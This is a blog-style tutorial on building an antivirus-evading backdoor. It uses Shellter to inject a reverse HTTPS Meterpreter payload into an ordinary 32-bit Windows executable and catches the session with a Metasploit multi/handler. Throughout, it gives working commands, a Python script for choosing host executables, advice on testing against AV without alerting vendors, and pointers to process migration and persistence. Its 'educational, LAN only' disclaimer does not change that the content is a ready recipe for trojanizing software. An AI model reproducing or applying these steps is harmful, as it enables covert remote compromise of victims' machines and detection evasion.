It's 2017 and traditional Antivirus solutions are becoming more obsolete with every passing day. The rise of exploit kits and "do it yourself" malware means that organizations can no longer rely solely on Antivirus to keep them safe. In fact, someone with little experience can now make a unique piece of malware that evades the majority, if not all, traditional Antivirus solutions.

This is a guide aimed at all skill levels, from students to professional penetration testers, and shows how anyone can create their own unique piece of malware (capable of evading AV) that gives them remote access to a machine, using Metasploit and Shellter.

Disclaimer: This guide is for educational purposes only, and can be used on a Local Area Network (LAN) to demonstrate how easily a workstation can be compromised without an organization being aware. It is limited to a LAN and does not cover port forwarding from public IPs to private IPs, command and control servers, or firewall configuration. That is largely unnecessary for an isolated demonstration; if enough interest is shown I may cover it in another guide. No warranty is provided on the accuracy of this guide and it is provided strictly as is. I will not go into what every command is doing in this particular tutorial, but depending on the community response I will explain it in more depth in another post.

Meterpreter and Shellter

The guide is in two parts:
1. Creating the backdoor
2. Setting up your Kali listener and handler

Creating the backdoor
- Elevate to root and install Shellter. Open a terminal and type:
    sudo su
    apt-get install shellter
  Shellter is a Windows program that Kali runs under Wine. If it fails to start because wine32 is missing, enable the 32-bit architecture and install it:
    dpkg --add-architecture i386
    apt-get update
    apt-get install wine32
- Find a 32-bit Windows executable to use as the host for the backdoor. It is not "vulnerable" in the usual sense: Shellter injects into ordinary 32-bit native (non-.NET, unpacked) PE files, and the uninstall executables left behind after installing a program work well. Copy it to your Kali Desktop.
- Change directory and run Shellter. In the same terminal type:
    cd Desktop
    shellter &
- Under Operation Mode select Automatic, then give the name of your target executable. Type:
    A
    <filename of the 32-bit executable>
- Shellter will trace the program and try to find an injection point for the backdoor. If it throws errors and fails, pick a different executable.
- Under Enable Stealth Mode, type:
    Y to attempt to preserve the original .exe functionality (not recommended if you used an uninstall executable, since the uninstaller would actually run), OR
    N to strip the program's original functionality and run it purely as a backdoor.
- Under Payloads, type:
    L to use a listed (native) Meterpreter payload, followed by the number of the payload you want, OR
    C to use a custom payload.
  Note which payload you pick: the Metasploit handler set up in the second part must use the matching payload type (this guide uses a reverse HTTPS Meterpreter).
- Find out your local IP address. Open your existing terminal and type:
    ifconfig
- Note your local IP address, e.g. 192.168.218.128 (shown next to 'inet').
- Set the connect-back address for the payload. Return to Shellter and, when prompted, type:
    <local IP address> for LHOST
    <local port to listen on, e.g. 8080> for LPORT
- You will see "Injection: Verified!".
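Before handing a file to Shellter it is worth a quick look at its PE headers, since Shellter only accepts 32-bit native executables and will reject 64-bit, DLL or .NET files anyway. The script below is an added example (my own code, not from the original guide or from Shellter) that parses just enough of the DOS, COFF, optional and section headers to answer those questions and to say which section the entry point lives in. The function names inspect_pe and build_sample_pe are mine, and the PE that build_sample_pe produces is a constructed, header-only file for testing, not a real program.

```python
"""Pre-check a candidate host executable for Shellter (added example).

Parses the PE headers to report: is this a 32-bit (PE32, i386) .exe, is it a
DLL, is it a .NET assembly (CLR data directory present), and in which section
does the entry point live. The sample PE built by build_sample_pe() is a
constructed header-only image used only for testing.
"""
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR (.NET) header slot
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def inspect_pe(data: bytes) -> dict:
    """Parse the DOS, COFF, optional and section headers of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, file_chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint (RVA)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    clr_rva = 0
    if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        clr_rva = struct.unpack_from(
            "<I", data, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)[0]
    # Section table follows the optional header, 40 bytes per entry.
    entry_section = None
    for i in range(nsections):
        name, vsize, vaddr, rawsize, *_rest, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        if vaddr <= entry < vaddr + max(vsize, rawsize):
            entry_section = (name.rstrip(b"\0").decode("ascii", "replace"),
                             bool(chars & IMAGE_SCN_MEM_EXECUTE))
    is_32bit = machine == IMAGE_FILE_MACHINE_I386 and magic == PE32_MAGIC
    is_dll = bool(file_chars & IMAGE_FILE_DLL)
    is_dotnet = clr_rva != 0
    return {
        "machine": machine,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "dll": is_dll,
        "dotnet": is_dotnet,
        "entry_point": entry,
        "entry_section": entry_section,
        # Minimum requirements for a Shellter host; Shellter's own trace still decides.
        "shellter_candidate": (is_32bit and not is_dll and not is_dotnet
                               and entry_section is not None and entry_section[1]),
    }


def build_sample_pe(machine=IMAGE_FILE_MACHINE_I386, magic=PE32_MAGIC,
                    clr_rva=0, dll=False) -> bytes:
    """Constructed header-only PE with one .text section (test input only)."""
    pe32plus = magic == PE32PLUS_MAGIC
    opt_size = 240 if pe32plus else 224            # 16 data directories
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    file_chars = 0x0102 | (IMAGE_FILE_DLL if dll else 0)  # EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, file_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, 16, 0x1010)        # entry point inside .text
    ndirs_off, dirs_off = (108, 112) if pe32plus else (92, 96)
    struct.pack_into("<I", opt, ndirs_off, 16)
    struct.pack_into("<II", opt, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR,
                     clr_rva, 0x48 if clr_rva else 0)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x400,
                       0, 0, 0, 0, 0x60000020)     # CODE | EXECUTE | READ
    return dos + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            info = inspect_pe(f.read())
        verdict = "candidate" if info["shellter_candidate"] else "not usable"
        print(f"{path}: {verdict} {info}")
```

Run it as `python3 pecheck.py uninstall.exe` against the executables you are considering; a "candidate" verdict only means the file meets the basic format requirements, and Shellter's own tracing of the program still decides whether an injection point is found.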
At this stage you are halfway there and can copy your created malware to a USB stick or the like.

Note: this is also your chance to scan it with AV, but I warn you, do not use VirusTotal.com. VirusTotal distributes uploaded samples to AntiVirus vendors, and before too long your file will be detected. A "no distribute" scanner such as nodistribute.com will let you test it against a large variety of commonly used AV engines without the sample being shared and added to their signature databases. Bear in mind that a clean result only reflects the static scan of the engines tested, not what endpoint protection will do when the backdoor actually runs and connects back.

After you have a coffee or some tea to perk you up, let's continue with the lesson.
Setting up your Kali listener and handler

- Run the Metasploit framework. Open your existing terminal and type:
    msfconsole
- Load the generic handler. Type:
    use exploit/multi/handler
- Configure the handler to match the payload you built into the backdoor. For the reverse HTTPS Meterpreter used here, type:
    set payload windows/meterpreter/reverse_https
    set LPORT <local port to listen on, e.g. 8080>
    set LHOST <local IP address>
  LHOST and LPORT must be exactly the values you gave Shellter, or the backdoor will have nowhere to connect back to.
- Start the listener and handler. Type:
    exploit
- The handler now waits for a connection and opens a Meterpreter console when one arrives. Start it before running the backdoor: a reverse payload connects out to LHOST:LPORT, so if nothing is listening when it runs you may not get a session. Ensure the victim machine can reach your Kali machine on that port (on a LAN this simply means the same network; no port forwarding is required), then run the infected executable on the victim machine.
At this stage you should have a Meterpreter session on the victim machine. The session lives only as long as the injected process is running: if the victim closes the program, the connection drops, which is why one of the first things usually done after gaining access is to migrate into a longer-lived process (Meterpreter's migrate command) and set up persistence.

Thank you for taking the time to read through this guide. If you would like to learn more about what happens when these commands are issued, how to remain persistent after gaining access, or what further actions can be taken once you are in, let me know so that I can make another post. If you've found this informative and wish to tip Cybytes please feel free, but it is not a requirement.

Until next time...